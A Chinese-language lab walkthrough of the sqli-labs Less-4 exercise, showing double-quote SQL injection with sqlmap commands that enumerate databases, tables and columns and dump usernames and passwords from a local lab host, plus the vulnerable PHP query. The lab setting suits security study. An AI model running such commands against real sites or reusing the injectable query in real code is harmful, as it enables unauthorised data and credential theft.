目錄
類型
雙引號注入
猜測sql語句
select * from users where id = ("參數") LIMIT 0,1
-dbs枚舉數據庫
使用-o參數優化
python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-4/?id=1" -dbs -o
我們已知是mysql數據庫,在過程中有詢問已發現是mysql,是否探測其他的DBMS,需要輸入y/n,爲了加快速度,以後的文章中將會使用--batch來跳過。
--tables枚舉數據庫表
python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-4/?id=1" --dbms mysql -o -D security --tables
--columns枚舉列
因爲-o參數中的threads是3,這裏使用--threads時應該大於3小於10(最大值),想了解更多sqlmap參數可查看文章末尾文章中的sqlmap學習筆記。
python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-4/?id=1" --dbms mysql -o --threads=10 -D security -T users --columns
--dump枚舉數據
python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-4/?id=1" --dbms mysql -o --threads=10 -D security -T users -C username,password -dump
查看源代碼
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
更多內容查看:網絡安全-自學筆記
有問題請下方評論,轉載請註明出處,並附有原文鏈接,謝謝!如有侵權,請及時聯繫。